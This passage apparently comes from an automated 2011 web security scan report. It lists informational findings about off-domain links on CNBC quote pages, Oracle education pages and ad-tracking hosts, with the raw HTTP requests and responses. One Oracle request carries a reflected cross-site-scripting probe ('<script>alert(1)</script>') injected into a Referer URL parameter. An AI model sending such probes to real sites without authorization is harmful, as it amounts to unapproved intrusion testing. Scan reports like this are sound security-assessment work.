document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg="></iframe>
...[SNIP]...

19.46. http://data.cnbc.com/quotes/CN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/CN

Issue detail

The page was loaded from a URL containing a query string:

http://data.cnbc.com/quotes/CN;SHI

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://js.adsonar.com/js/adsonar.js
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/batmobile_93.jpg
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/roofer_93.jpg
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/suburb_93.jpg
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js
http://www.nbcuniversalstore.com/?v=cnbc
http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions

Request

GET /quotes/CN;SHI HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:27 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109980
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
       <script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
<div class="fL w655" style="margin-right:5px;">


                                                                                                                   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="1" height="1" id="flashQuoteProxy" align="middle">
                                                   <param name="allowScriptAccess" value="always">
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<a href="/id/44345379"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/batmobile_93.jpg"></a>
...[SNIP]...
<a href="/id/44344096"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/roofer_93.jpg"></a>
...[SNIP]...
<a href="/id/44347217"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/suburb_93.jpg"></a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions">DVDs</a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/?v=cnbc">Merchandise</a>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

19.47. http://data.cnbc.com/quotes/CN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/CN

Issue detail

The page was loaded from a URL containing a query string:

http://data.cnbc.com/quotes/CN;SHI/tab/2

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://js.adsonar.com/js/adsonar.js
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/batmobile_93.jpg
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/roofer_93.jpg
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/suburb_93.jpg
http://www.nbcudigitaladops.com/hosted/stage/global.js
http://www.nbcuniversalstore.com/?v=cnbc
http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions

Request

GET /quotes/CN;SHI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:26 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109298
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<div class="fL w655" style="margin-right:5px;">


                                                                                                                   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="1" height="1" id="flashQuoteProxy" align="middle">
                                                   <param name="allowScriptAccess" value="always">
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<a href="/id/44345379"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/batmobile_93.jpg"></a>
...[SNIP]...
<a href="/id/44344096"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/roofer_93.jpg"></a>
...[SNIP]...
<a href="/id/44347217"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/suburb_93.jpg"></a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions">DVDs</a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/?v=cnbc">Merchandise</a>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

19.48. http://data.cnbc.com/quotes/HK previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/HK

Issue detail

The page was loaded from a URL containing a query string:

http://data.cnbc.com/quotes/HK;HSI/tab/2

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://js.adsonar.com/js/adsonar.js
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/batmobile_93.jpg
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/roofer_93.jpg
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/suburb_93.jpg
http://www.nbcudigitaladops.com/hosted/stage/global.js
http://www.nbcuniversalstore.com/?v=cnbc
http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions

Request

GET /quotes/HK;HSI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109239
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<div class="fL w655" style="margin-right:5px;">


                                                                                                                   <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="1" height="1" id="flashQuoteProxy" align="middle">
                                                   <param name="allowScriptAccess" value="always">
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<a href="/id/44345379"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/batmobile_93.jpg"></a>
...[SNIP]...
<a href="/id/44344096"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/roofer_93.jpg"></a>
...[SNIP]...
<a href="/id/44347217"><img align="left" border="0" vspace="0" hspace="0" class="mB5 mR10 Dot_CNBC_boxIMG" src="http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/linklists/slideshows/thumbs/suburb_93.jpg"></a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/index.php?v=cnbc_original-productions">DVDs</a>
...[SNIP]...
<div class="cnbc_submenutitle">
<a style="color: rgb(255, 255, 255); text-decoration: none; margin-top: 3px; margin-left: -5px;"
class="cnbc_submenutitle" onmouseover="this.style.color='#FFDF0A'" onmouseout="this.style.color='#FFFFFF'"
href="http://www.nbcuniversalstore.com/?v=cnbc">Merchandise</a>
...[SNIP]...
</div>
       <script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

19.49. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/db_pages.getpage

Issue detail

The page was loaded from a URL containing a query string:

http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=501

The response contains the following link to another domain:

https://global-ebusiness.oraclecorp.com/OA_HTML/RF.jsp?function_id=1174607&resp_id=-1&resp_appl_id=-1&security_group_id=0&lang_code=US&params=5o2QgS9hDwCYOTRqCX6vVj51kgORxPc5zlyw7Cc3QpWNnoAhsc5vZ5ZDX6d7IsLTFIYjfvuOEhKl6z1hsRi9ww

Request

GET /pls/web_prod-plq-dad/db_pages.getpage?page_id=501 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/searchResult.searchEngineParser
Cookie: SearchParams-cookie=%3CSearchParams%20type%3D%22SearchParams%22%3E%0A%20%20%20%3Ckeyword%20type%3D%22string%22%3Exss%3C/keyword%3E%0A%20%20%20%3Cstart_month%20type%3D%22string%22%3E%3C/start_month%3E%0A%20%20%20%3Cstart_year%20type%3D%22string%22%3E%3C/start_year%3E%0A%20%20%20%3Cend_month%20type%3D%22string%22%3E%3C/end_month%3E%0A%20%20%20%3Cend_year%20type%3D%22string%22%3E%3C/end_year%3E%0A%20%20%20%3Cfrom_date%20type%3D%22string%22%3E%3C/from_date%3E%0A%20%20%20%3Cto_date%20type%3D%22string%22%3E%3C/to_date%3E%0A%20%20%20%3Ccountries%20type%3D%22string%22%3E1001%3C/countries%3E%0A%20%20%20%3Cslocation%20type%3D%22string%22%3E%3C/slocation%3E%0A%20%20%20%3Ccategory_id%20type%3D%22string%22%3E%3C/category_id%3E%0A%20%20%20%3Cformat%20type%3D%22string%22%3E%3C/format%3E%0A%20%20%20%3CmaterialLang%20type%3D%22string%22%3E%3C/materialLang%3E%0A%20%20%20%3CspokenLang%20type%3D%22string%22%3E%3C/spokenLang%3E%0A%20%20%20%3CadvancedSearch%20type%3D%22string%22%3EY%3C/advancedSearch%3E%0A%20%20%20%3CforceExpSearch%20type%3D%22string%22%3E%3C/forceExpSearch%3E%0A%20%20%20%3CcopyObject%20type%3D%22Function%22%3E%0A%3C%21%5BCDATA%5Bfunction%20copyObject%28_obj%29%20%7B%0A%20%20%20%20this.keyword%20%3D%20_obj.keyword%3B%0A%20%20%20%20this.category_id%20%3D%20_obj.category_id%3B%0A%20%20%20%20this.format%20%3D%20_obj.format%3B%0A%20%20%20%20this.start_month%20%3D%20_obj.start_month%3B%0A%20%20%20%20this.start_year%20%3D%20_obj.start_year%3B%0A%20%20%20%20this.end_month%20%3D%20_obj.end_month%3B%0A%20%20%20%20this.end_year%20%3D%20_obj.end_year%3B%0A%20%20%20%20this.slocation%20%3D%20_obj.slocation%3B%0A%20%20%20%20this.countries%20%3D%20_obj.countries%3B%0A%20%20%20%20this.materialLang%20%3D%20_obj.materialLang%3B%0A%20%20%20%20this.forceExpSearch%20%3D%20_obj.forceExpSearch%3B%0A%20%20%20%20this.advancedSearch%20%3D%20_obj.advancedSearch%3B%0A%7D%5D%5D%3E%20%20%20%3C/copyObject%3E%0A%3C/SearchParams%3E%0A; BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 55536
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115409687157544,0)
Date: Tue, 06 Sep 2011 16:02:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<td valign="top" align="center">
<a href="https://global-ebusiness.oraclecorp.com/OA_HTML/RF.jsp?function_id=1174607&resp_id=-1&resp_appl_id=-1&security_group_id=0&lang_code=US&params=5o2QgS9hDwCYOTRqCX6vVj51kgORxPc5zlyw7Cc3QpWNnoAhsc5vZ5ZDX6d7IsLTFIYjfvuOEhKl6z1hsRi9ww" target="_blank">
<img src="http://education.oracle.com/images/employee_cart_icon.gif" WIDTH="18" HEIGHT="18" border="0" ALT="Employees">
...[SNIP]...

19.50. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/webreg_course_index.main

Issue detail

The page was loaded from a URL containing a query string:

http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2

The response contains the following link to another domain:

http://oracleimg.com/admin/images/stretch.gif

Request

GET /pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2 HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect?redir_type=36&p_org_id=1001&p_url=cd6e2%22%3E%3Cscript%3Ealert(1)%3C/script%3E818bc7ecf2f
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
Content-Length: 18800
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=144115289428037548,0)
Date: Tue, 06 Sep 2011 16:01:39 GMT


<HTML><HEAD>
<TITLE>SSCD - Course Index</TITLE>
<LINK REL=stylesheet type="text/css" HREF="/admin/oracle.css">
<STYLE>
                   TD.selected    {BACKGROUND-COLOR: #CCCC99}
                   TD.nonSelec
...[SNIP]...
<td width="10">
   <img src="http://oracleimg.com/admin/images/stretch.gif" width="10" alt="">
   </td>
...[SNIP]...

19.51. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=3267000;type=homep770;cat=homep781;ord=1;num=6780372345820.069?

The response contains the following links to other domains:

https://cts.w55c.net/ct/ct-4947e18d0acd4b329511c553466a8980.js
https://js.revsci.net/gateway/gw.js?csid=I10981&rtid=10158&auto=t
https://secure.leadback.advertising.com/adcedge/lb?site=695501&betr=bigcommerce_cs=[+]1[720],3[8760]

Request

GET /activityi;src=3267000;type=homep770;cat=homep781;ord=1;num=6780372345820.069? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 06 Sep 2011 15:34:46 GMT
Expires: Tue, 06 Sep 2011 15:34:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 559
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&betr=bigcommerce_cs=[+]1[720],3[8760]" width="1" height="1" border="0"><script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=I10981&rtid=10158&auto=t"></script><script type="text/javascript" src="https://cts.w55c.net/ct/ct-4947e18d0acd4b329511c553466a8980.js"></script>
...[SNIP]...

19.52. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221?

The response contains the following links to other domains:

http://a.tribalfusion.com/i.cid?c=271753&d=30&page=landingPage
https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=compsci_cs=1&betq=8029=399959

Request

GET /activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 06 Sep 2011 15:57:43 GMT
Expires: Tue, 06 Sep 2011 15:57:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1151
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src='http://a.tribalfusion.com/i.cid?c=271753&d=30&page=landingPage' width='1' height='1' border='0'><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=compsci_cs=1&betq=8029=399959" width = "1" height = "1" border = "0"></body>
...[SNIP]...

19.53. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071435827/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1071435827/

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071435827/?random=1315341856992&cv=6&fst=1315341856992&num=1&fmt=1&value=0&label=KhpeCOWsqgEQs6Dz_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.netsuite.com/portal/home.shtml&url=http%3A//www.netsuite.com/portal/products/netsuite/financials/main.shtml&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true

The response contains the following link to another domain:

https://services.google.com/sitestats/en.html?cid=1071435827

Request

GET /pagead/viewthroughconversion/1071435827/?random=1315341856992&cv=6&fst=1315341856992&num=1&fmt=1&value=0&label=KhpeCOWsqgEQs6Dz_gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=20&u_nmime=100&ref=http%3A//www.netsuite.com/portal/home.shtml&url=http%3A//www.netsuite.com/portal/products/netsuite/financials/main.shtml&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 06 Sep 2011 15:44:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 378
X-XSS-Protection: 1; mode=block

<html><body bgcolor="#666666" link="#FFFFFF" alink="#FFFFFF" vlink="#FFFFFF" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#FFFFFF">Google Site Stats - <a href="https://services.google.com/sitestats/en.html?cid=1071435827" target="_blank">learn more</a>
...[SNIP]...

19.54. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netsuite-www.baynote.net
Path:	/baynote/tags2/guide/results-products/netsuite-www

Issue detail

The page was loaded from a URL containing a query string:

http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www?userId=6923713758307492964&customerId=netsuite&code=www&id=0&guide=ContentGuide&resultsPerPage=5&referrer=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&url=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml&appendParams=&rankParam=&condition=d%26g%26s&v=1

The response contains the following links to other domains:

http://www.netsuite.com/portal/products/netsuite/analytics/main.shtml
http://www.netsuite.com/portal/products/netsuite/financial-planning/main.shtml
http://www.netsuite.com/portal/products/netsuite/financials/financial-management.shtml
http://www.netsuite.com/portal/products/netsuite/main.shtml
http://www.netsuite.com/portal/products/netsuite/revenue-recognition/main.shtml

Request

GET /baynote/tags2/guide/results-products/netsuite-www?userId=6923713758307492964&customerId=netsuite&code=www&id=0&guide=ContentGuide&resultsPerPage=5&referrer=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml&url=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml&appendParams=&rankParam=&condition=d%26g%26s&v=1 HTTP/1.1
Host: netsuite-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:44:15 GMT
Content-Length: 3780

bnTagManager.getTag(0).results = "<div class='bn_g_container' id='bn_guidecontainer0'><div class='bn_g_area' id='bn_guidearea0'><div class='bn_g_welcome' id='bn_guidewelcome0
...[SNIP]...
